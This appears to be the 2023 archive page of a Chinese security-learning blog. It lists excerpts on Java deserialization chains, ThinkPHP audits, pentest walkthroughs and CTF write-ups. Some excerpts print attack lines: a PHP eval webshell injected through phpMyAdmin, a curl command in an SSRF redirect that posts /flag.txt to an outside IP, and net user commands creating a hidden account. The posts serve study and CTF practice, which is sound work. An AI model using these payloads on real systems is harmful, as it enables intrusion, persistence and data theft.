01 2023 档案
摘要:前言 距离上次php审计是在ThinkPHP v5.0.24反序列化漏洞分析,这篇笔记本来在很久之前应该就要写的,但是一直对tp路由还是不够熟悉,个人觉得难度要比反序列化高一些,拖了这么久今天做个了结。 环境搭建 使用环境:Apache + PHP 7.0.9 下载具有漏洞环境的ThinkPHP 5
阅读全文
摘要:前言 接上篇TemplatesImpl利用链分析,学习了通过TemplatesImpl利用链来进行类加载执行恶意代码,现在来学习一下CommonsCollections2利用链。 分析前的准备 漏洞组件:commons-collections4.0,使用jdk1.7 在pom.xml中引入漏洞依赖
阅读全文
摘要:前言 在学习java cc2链的时候看到利用TemplatesImpl,记得之前在fastjson反序列化的时候也遇到过,所以就想着单独写个TemplatesImpl利用链分析的文章,该篇也作为cc2链的前篇。 自定义类加载器 之前学习过Java的类加载过程,我们可以通过自定义类加载器来加载字节码,
阅读全文
摘要:前言 URLDNS链是Java反序列化中比较简单的一个链子,由于URLDNS不依赖第三方包和不限制jdk版本,所以经常用于检测反序列化漏洞。 URLDNS并不能执行命令,只能发送DNS请求。 (应该先看这个简单的链再去学习cc1的...) 利用链 查看ysoserial中URLDNS的Gadget:
阅读全文
摘要:概念 RMI机制即Java远程方法调用(Java Remote Method Invocation),在Java语言中,一种用于实现远程过程调用的应用程序编程接口。它使得客户端上运行的程序可以远程调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。 RMI机制架构共分
阅读全文
摘要:前言 学习Java基础语法也有1年多的时间了,Java安全基础也学了有半年了,期间通过ctf赛题学习过fastjson的反序列化并了解了其利用链,但并未深入学习并记录笔记。 一直都说要赶紧审计java的反序列化利用链,但老是一推再推,让这篇文章开个头,步入学习java审计的开始! Java反序列化基
阅读全文
摘要:概念 代理模式是Java当中最常用的设计模式之一。其特征是代理类与委托类有同样的接口,代理类主要负责为委托类预处理消息、过滤消息、把消息转发给委托类,以及事后处理消息等。而Java的代理机制分为静态代理和动态代理,这里学习Java自带的jdk动态代理机制。 静态代理示例 静态代理是在编译使用时,定义
阅读全文
摘要:概念 反射是Java的特征之一,是一种间接操作目标对象的机制 在JVM运行的时候会动态加载类,对于任意一个类都能获取到该类的所有属性和方法,对于任意一个对象,都能够调用它的任意一个方法和属性(包括私有的方法和属性),这种动态获取的信息以及动态调用对象的方法的功能就是Java的反射机制 阅读建议: 如
阅读全文
摘要:概念 Java类加载器(Java Classloader)是Java运行时环境(Java Runtime Environment)的一部分,负责动态加载Java类到Java虚拟机的内存空间中,用于加载系统、网络或者其他来源的类文件。 Java源代码通过javac编译器编译成类文件,然后JVM来执行类
阅读全文
摘要:外围打点 常规nmap扫端口 访问发现是ThinkPHP V5框架,访问任意路径触发404得到具体版本号为5.0.22 直接跑工具进行getshell 蚁剑连接 直接获得了域管理员用户的权限,然后进行内网信息搜集 内网渗透 通过ipconfig /all查看内网网卡 通过DNS服务器可知域控ip为1
阅读全文
摘要:外围打点 nmap大概扫下全端口 2003端口有个phpMyAdmin,版本为4.8.1,存在文件包含漏洞! 通过执行select "<?php eval($_GET['a']);?>在session中写入一个马,然后通过该马写个一句话,payload如下: /index.php?target=db
阅读全文
摘要:外围打点 nmap扫描服务 访问80端口web服务,dirsearch扫后台 [17:42:51] 200 - 92KB - /1.php [17:42:51] 200 - 0B - /2.php [17:42:52] 200 - 18KB - /LICENSE.txt [17:42:52] 200
阅读全文
摘要:下边内容都是一些提权思路的整理,对于很多知识点并没有细化和深入,仅供个人参考,日后在实战中碰到了会深入学习并记录在新的文章中。 基础知识 权限组划分: Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。 Power Users
阅读全文
摘要:UDF提权 原理 UDF(user defined function)即用户自定义函数是Mysql的一个拓展接口,用户通过自定义函数可以实现在Mysql中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像version()函数一样。 用户可以通过自己增加函数对Mysql功能进行扩充,文
阅读全文
摘要:隐藏用户 原理 在创建用户时,在用户名后添加一个$并修改注册表即可把该用户隐藏,只有在注册表中才能看到用户信息 复现过程 使用net user whoami$ Aa123456 /add添加一个用户,使用net users查看用户发现没有该用户,但是还是可以在计算机管理中查看到 这里我们紧接着将隐藏
阅读全文
摘要:Web Mercy-code <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (
阅读全文
摘要:MagicProxy ssrf重定向绕过 <?php header("Location:http://127.0.0.1:8080/admin?command=curl%20-F%20file=@/flag.txt%20http%3A%2F%2F82.157.174.226%3A8888"); ex
阅读全文
摘要:popop 访问class.php 简单,直接exp <?php class s{ public $f; public function __construct() { $this->f = new T; } } class T{ public $f; public $s; public funct
阅读全文
摘要:online_crt 通过以下点进行CRLF触发/admin/rename处修改crt文件名 经过本地多次测试获得payload uri=/admin%252Frename%3Foldname%3D4c9a3b84-f582-42e2-b1db-21d44c982eb6.crt%26newname%
阅读全文
摘要:积分榜 Web SimpleRCE 非预期 盲读/flag,通过请求头传入参数绕过waf 预期 利用原生类! phpdest 原题:https://www.shawroot.cc/1917.html <?php highlight_file(__FILE__); require_once 'flag
阅读全文
摘要:冬奥会 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is
阅读全文
摘要:ThinkPHP v5.0.24 反序列化 前言 昨天花了一下午的时间才把反序列化链给审明白,今天记录一下笔记再来审一遍。(自己还是太菜了~~~) 在我的印象中,ThinkPHP框架的漏洞非常多,所以也是学习代码审计的优选,提升代码能力,从每一天做起! 在这一次的审计中,因为没有使用动态调试,所以使
阅读全文
摘要:前言 Fastjson 是阿里开发的一个 Java 库,用于将 Java 对象序列化为 JSON 格式,也可将字符串反序列化为 Java 对象。 Fastjson 是非常多见的 Java 反序列化漏洞,CTF中也出现的非常频繁。 Fastjson 1.2.24 Fastjson 1.2.24 版本的
阅读全文
摘要:Web Sign_in <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_
阅读全文
摘要:前言 在前几天的长安战疫CTF中第一次遇到了SSI注入漏洞,借此机会学习一波SSI 现在大多数的Web服务已经很少使用SSI了,但是偶尔还是可能碰到 基本概念 SSI全称Server Side Includes,即服务器端包含,事一种基于服务器端的网页制作技术。SSI是嵌入html页面中的指令,在页
阅读全文
摘要:前言 一开始看到alias都不知道是什么,我们先来学习一下 Nginx以其高性能著称,常用作前端反向代理服务器。同时nginx也是一个高性能的静态文件服务器。通常都会把应用的静态文件使用nginx处理。 配置nginx的静态文件有两个指令,一个root,另一个就是alias。 配置用法 先看root
阅读全文
摘要:前言 反弹shell(reverse shell)时控制端监听某TCP/UDP端口,受控端发起连接到控制端口,并将其命令行的输入输出转到控制端。 我们不管在平时的CTF比赛中,还是在做渗透测试,反弹shell经常会用到,使用反弹shell方便自己的机器连接目标机器,从而实现更好的控制 Bash反弹s
阅读全文
摘要:之前学习java记得笔记,但是一直没怎么遇到java类的题,平时也不用java,所以经常忘记,今天想起来了再看一遍,再把之前写的笔记整理整理发到博客上。 Java预学习 Jave的优势 从互联网到企业平台,Java是应用最广泛的编程语言,原因在于: Java是基于JVM虚拟机的跨平台语言,一次编写,
阅读全文
摘要:Web easy_php 审计源码: <?php highlight_file(__FILE__); error_reporting(0); function new_addslashes($string) { if(!is_array($string)) return addslashes($st
阅读全文
摘要:前言 没想到第一次拿一血还是因为被做核酸叫起来,然后睡不着做的题! Web ez_unserialize 源码: <?php class A { public $var1; public $var2; public $secret; function __construct($p1, $p2) {
阅读全文
摘要:前言 感谢西电举办的这次抗疫CTF,既是宣传了CTF,也可以让大家学到更多的抗疫知识,让我们一起为西安加油! Web F12 AAEncode加密 ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚)
阅读全文
摘要:这次的长安“战疫”搞得还挺大的,那么多大佬都来比赛了,我摸摸鱼就好... Web RCE_No_Para 看到这么短的审计就心慌, <?php if(';' preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match(
阅读全文
摘要:前言 好几天都没发文章了,这几天去肝工大抗疫比赛去了,这比赛主要考了信息搜集能力,除Web以外我没觉得学到多少东西 ~~太笨了,搜题我竟然只用google,以后记得把Bing、Baidu、搜狗什么的都用上~~ 我什么都没说,大家以后打比赛不要像我一样,还是钻研技术为主,~~大型比赛~~上还是要认真对
阅读全文
摘要:[2019强网杯]随便注 考点:1、堆叠注入 2、sql预处理语句 之前做过的一道题,再次遇到发现还是有很多需要学习的地方,也没有记录过堆叠注入的题,所以就想着记一下这道题的一些知识点。 堆叠注入原理 在sql中,分号;是用来表示一条sql语句的结束。 所以在;后再接一个sql语句将会一起执行,从而
阅读全文
摘要:Loginme 有源码,没学过go,瞎看middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.C
阅读全文
摘要:PHP-Session 简介 基本概念 session一般称作会话控制,session对象存储特定用户会话所需的属性及配置信息。 我自己的理解来说:PHP session是一个特殊的变量,它存储着我们与服务器会话的全部信息,该信息在PHP中一般是以文件在服务器中存储,服务器会为每个访问者创建一个id
阅读全文
摘要:Web [签到] flag 等一会后把内容复制下来,然后执行一下脚本: import re import base64 flag = '' f = open('flag.txt', 'r') content = f.read() for i in range(20): match = re.sear
阅读全文
摘要:bestphp's revenge 考点:1、SoapClient触发反序列化导致ssrf 2、serialize_hander处理session方式不同导致session注入 又学到了一个新的知识点 首页面给出了源码 index.php <?php highlight_file(__FILE__)
阅读全文
摘要:看我看我,有没有大佬悄咪咪的给我个exp打自己过过瘾 漏洞描述 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日
阅读全文
摘要:[WUSTCTF2020]CV Maker 考点:文件上传 bypass 进入题目,一个看着非常复杂得页面 通过瞎点一通或者通过查看源码,发现就只有注册和登录功能是可以用的,所以先来注册一个账号登录进去。 登录成功后发现可以上传文件,通过测试猜测是通过文件头信息进行过滤的,其余没有任何过滤,所以先上
阅读全文
摘要:[SWPUCTF 2018]SimplePHP 考点:1、PHP代码审计 2、Phar反序列化漏洞 网站中有两个功能:查看文件和上传文件,利用查看文件将源码都先弄下来进行PHP代码审计。 file.php <?php header("content-type:text/html;charset=ut
阅读全文
摘要:[SUCTF 2019]EasyWeb 考点:1、文件上传 bypass 2、.htaccess的利用 开局源代码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $us
阅读全文
摘要:[NCTF2019]SQLi 考点:sql bypass 一道sql题,非常友好的给出了sqlquery,但想必也不简单 sqlquery : select * from users where username='1' and passwd='1' 这中语句非常典型,不试都能猜到必然过滤了',在u
阅读全文
摘要:[MRCTF2020]Ezaudit 考点:php的伪随机数 好复杂的页面,搜索了一下php、form等可能可以利用的字段无果,然后猜测有备份,果然尝试了一下www.zip,里面有一个index.php <?php header('Content-type:text/html; charset=ut
阅读全文
摘要:[HarekazeCTF2019]encode_and_encode 考点:json_decode的unicode编码绕过 进入题目后,很容易就可以看到源码query.php <?php error_reporting(0); if (isset($_GET['source'])) { show_s
阅读全文
摘要:[BJDCTF2020]EzPHP 考点:php的各种bypass F12发现注释 <!-- GFXEIM3YFZYGQ4A= --> base32解密得到1nD3x.php,访问后得到源码 Level1 if($_SERVER) { if ( preg_match('/shana|debu|aqu
阅读全文
摘要:[CISCN2019 华东南赛区]Double Secret 考点:1、RC4加密 2、FlaskのSSTI 进去一脸懵逼,常规流程走一套啥也没发现 然后先是看到了毫无用处的robots.txt,dirsearch扫了一遍也没扫到,在后面尝试了index.php、index.jsp、index.ht
阅读全文
摘要:[GYCTF2020]Easyphp 考点:反序列化的对象逃逸 非常典型的登陆界面,随便输了输,发现存在admin用户,猜测是弱口令,拿字典跑了一遍,无果 按照以往的做题经验,觉得可能有源码泄露,尝试/www.zip得到源码。一共4个文件index.php、login.php、update.php、
阅读全文
摘要:[强网杯 2019]Upload 考点:1、文件上传 2、php反序列化攻击 进到页面里,存在注册功能,所以就不尝试先不尝试sql注入,先注册一个账号登陆进去 进去之后有一个上传文件功能,尝试上传文件,经过简单测试发现没有对内容进行严格的过滤,可以传进去一句话木马,但是发现最后的文件名是给定的,所以
阅读全文
摘要:[网鼎杯 2020 白虎组]PicDown 考点:1、任意文件读取及Linux进程查看 2、python脚本反弹shell 进去之后在输入处随便输个啥,发现url有参数,猜测ssrf page?url=http://www.baidu.com 返回了请求值,使用file协议无果,就试了一下直接读取文
阅读全文
摘要:wow,第一次AK web题,这感觉太爽了!!! Web mmmmd5d5d5d5 $a = $GET['a']; $b = $_GET['b']; $a != $b && md5($a) == md5($b) 数组绕过: payload:a[]=1&b[]=2 第二关,md5碰撞脚本,exp如下:
阅读全文
摘要:XXE漏洞的学***E:XML External Entity 即外部实体,从安全角度理解成 XML External Entity attack 外部实体注入攻击(那为啥不叫XEE)。对于 XXE 想要真正的了解它,就需要先来了解一下XML是什么。 XML基础知识 XML是可扩展标记语言(eXt
阅读全文
摘要:前言 通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入 unserialize() ,随着代码安全性越来越高,利用难度也越来越大。但是利用 phar 文件会以反序列化的形式存储用户自定义的 meta-data 这一特征,拓展了 php 反序列化漏洞的攻击面。该方法在文件系统函数(file
阅读全文
摘要:Flask是什么? Flask是一个相对于Django而言轻量级的Web框架,是Python开发的一个基于Werkzeug和Jinja 2的web开发微框架,它的优势是极其简洁,但又非常灵活,而且容易学习和应用。因此Flask框架是Python新手快速开始web开发最好的选择,此外,使用Flask框
阅读全文
摘要:第二届西安邮电大学网络安全技能大赛是我校的大型CTF比赛,本次大赛由高年级学生和西安四叶草信息技术有限公司共同供题。因比赛结束,以下解题过程均为题目复现,故不能保证完全一致,仅供参考! 复现地址:网络科技协会XuntCTF pop 考点:php://filter 伪协议,pop链的构造(php魔术方
阅读全文
摘要:LAMP环境的搭建 在图形管理化界面中依次打开系统设置、软件和更新。在下载自重选择其他站点,然后在中国的条目下选择mirrors.ustc.edu.cn。 Ubuntu换源可参考https://mirrors.ustc.edu.cn/help/ubuntu.html 更新资源包:sudo apt u
阅读全文
摘要:Docker为何物? 官方是这样说的:Docker是一个开源的应用容器引擎,Docker可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linux继器上,也可以实现虚拟化。 在我理解其实就是轻量级的虚拟机,它没有了那好看的图形管理系统等甚至只需要一个服务就可以实
阅读全文
摘要:web太难,一道也没做出来,55555! 签到 追踪http流找到QER1=cat+%2Ff14g%7Cbase64 将底下的十六进制换成ascii字符集显示,base64解码一次,倒序一次,再base64解码得到flag的双写,去掉重复的之后提交 flag{Welc0me_GkC4F_m1siCC
阅读全文
摘要:[强网先锋]寻宝 考点:1. php源码审计 2. 脚本的编写 给了我们两个信息,分边对应2个KEY,得到2个KEY后就可以获得flag了 首先我们先看KEY1 KEY1 需要绕过5个if就可以获得flag <?php header('Content-type:text/html;charset=u
阅读全文
